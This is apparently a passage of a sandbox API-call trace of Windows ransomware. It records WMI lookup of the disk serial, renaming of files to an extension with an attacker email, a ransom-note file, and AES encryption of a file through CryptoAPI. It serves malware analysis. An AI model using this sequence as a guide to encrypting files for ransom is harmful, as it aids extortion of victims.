WbemLocator:IClassFactory:CreateInstance (in: This=0x6024aa0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60271e0) returned 0x0 [0199.614] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x0 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60271e0) returned 0x0 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0199.614] WbemLocator:IUnknown:AddRef (This=0x60271e0) returned 0x3 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0199.614] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0199.614] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0199.614] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x2 [0199.614] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x1 [0199.614] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0199.614] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0199.614] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60271e0) returned 0x0 [0199.614] WbemLocator:IUnknown:AddRef (This=0x60271e0) returned 0x3 [0199.614] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x2 [0199.614] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0199.614] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0199.615] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.615] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027190) returned 0x0 [0199.615] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027190, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x603373c) returned 0x0 [0199.648] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b9a4) returned 0x0 [0199.648] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b9a4, pProxy=0x603373c, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0199.648] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x1 [0199.648] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b9c4) returned 0x0 [0199.649] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b9a4) returned 0x0 [0199.649] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b9a4, pProxy=0x603373c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0199.649] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x2 [0199.649] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0199.649] CoTaskMemFree (pv=0xbd4918) [0199.649] WbemLocator:IUnknown:Release (This=0x6027190) returned 0x0 [0199.649] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b9c4) returned 0x0 [0199.649] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0199.650] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0199.650] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0199.650] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0199.650] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0199.650] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b924) returned 0x0 [0199.650] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.651] WbemLocator:IUnknown:Release (This=0xb5b924) returned 0x3 [0199.651] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0199.651] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0199.651] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b9ac) returned 0x0 [0199.651] WbemLocator:IRpcOptions:Query (in: This=0xb5b9ac, pPrx=0xb5b9c4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0199.651] WbemLocator:IUnknown:Release (This=0xb5b9ac) returned 0x3 [0199.651] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0199.651] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0199.651] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0199.651] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x603373c) returned 0x0 [0199.651] WbemLocator:IUnknown:AddRef (This=0x603373c) returned 0x4 [0199.651] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x3 [0199.651] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x2 [0199.651] SysStringLen (param_1=0x0) returned 0x0 [0199.651] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0199.651] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0199.651] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.651] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0199.651] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0199.651] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b9c4) returned 0x0 [0199.652] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x3 [0199.652] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0199.652] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0199.652] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.652] IWbemServices:GetObject (in: This=0x603373c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6027b20, ppCallResult=0x0) returned 0x0 [0199.666] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0199.666] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0199.666] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.666] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3664948*=0, plFlavor=0x366494c*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3664948*=8, plFlavor=0x366494c*=0) returned 0x0 [0199.667] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.667] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.667] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3664948*=8, plFlavor=0x366494c*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3664948*=8, plFlavor=0x366494c*=0) returned 0x0 [0199.667] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.667] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.667] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0199.667] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x60 [0199.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0199.667] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x30b4b2c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0199.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0199.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0199.669] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0199.669] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0199.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0199.669] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e3de660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2e3de660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2e3de660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0199.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0199.669] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0199.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0199.670] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), fInfoLevelId=0x0, lpFileInformation=0x3664f1c | out: lpFileInformation=0x3664f1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692)) returned 1 [0199.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0199.670] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0199.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0199.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0199.670] GetFileType (hFile=0x324) returned 0x1 [0199.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0199.670] GetFileType (hFile=0x324) returned 0x1 [0199.670] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x692 [0199.671] ReadFile (in: hFile=0x324, lpBuffer=0x3665794, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x3665794*, lpNumberOfBytesRead=0x6d8edac*=0x692, lpOverlapped=0x0) returned 1 [0201.145] CloseHandle (hObject=0x324) returned 1 [0201.145] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe00b8) returned 1 [0201.147] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x3686e58 | out: pbBuffer=0x3686e58) returned 1 [0201.692] CryptImportKey (in: hProv=0xbe00b8, pbData=0x37b015c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f650) returned 1 [0201.692] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.692] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.692] CryptDuplicateKey (in: hKey=0xb7f650, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fa50) returned 1 [0201.692] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.692] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x4, pbData=0x37b023c*=0x1, dwFlags=0x0) returned 1 [0201.692] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x1, pbData=0x37b0208, dwFlags=0x0) returned 1 [0201.692] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37b024c*, pdwDataLen=0x6d8ed78*=0x6a0, dwBufLen=0x6a0 | out: pbData=0x37b024c*, pdwDataLen=0x6d8ed78*=0x6a0) returned 1 [0201.693] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37b0910*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x37b0910*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0201.694] CryptDestroyKey (hKey=0xb7f650) returned 1 [0201.694] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0201.694] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0201.694] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0201.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0201.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0201.695] GetFileType (hFile=0x2f0) returned 0x1 [0201.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0201.695] GetFileType (hFile=0x2f0) returned 0x1 [0201.695] WriteFile (in: hFile=0x2f0, lpBuffer=0x37b0f18*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x37b0f18*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0201.696] CloseHandle (hObject=0x2f0) returned 1 [0201.696] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0201.696] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0201.696] CoTaskMemFree (pv=0xbed438) [0201.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.696] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0201.697] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0201.697] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0201.697] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.697] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027190) returned 0x0 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027190, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, 